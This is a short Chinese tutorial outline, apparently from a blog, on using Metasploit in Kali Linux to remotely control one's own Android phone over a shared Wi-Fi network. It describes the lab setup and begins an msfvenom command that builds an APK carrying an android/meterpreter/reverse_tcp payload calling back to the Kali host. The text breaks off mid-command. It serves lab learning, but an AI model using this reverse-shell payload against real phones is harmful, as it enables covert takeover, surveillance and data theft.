目标:使用Kali里的Metasploit远程控制自己的安卓手机
(先写个大体的流程,改天做成详细教程。仅限于对自己的手机做实验,请勿用于非法行为)
需要的知识板块::1,Metasploit (msfvenom+msfconsole)
2,apk签名验证
3,网络连接基础
实验环境:
对我自己
1,Kali 2020.3 (物理机Thinkpad X201)IP: 192.168.1.12
2,安卓手机(华为荣耀)IP: 192.168.1.19
3,网络连接(连接在同一个WIF下)
对于广大网友,大多数都是虚拟机安装的Kali,也是一样的。需要设置的是虚拟机网络设置成桥接模式,确保你的windows+虚拟机+安卓手机都在同一个网段。比如192.168.10.XXX。别扯什么桥接不安全什么的,你是个普通大众没人在意你,你的目的是要完成这个实验,是要理解整个过程的原理。
开始——————————————————————————————
一:生产apk安卓应用
1,使用msfvenom生成一个预设定向连接kali主机的apk安卓应用。
lhost=192.168.1.12 (这是Kali的IP)lport=4444 (默认4444,可以自定义)
msfvenom -p android/meterpreter/reverse_tcp lhost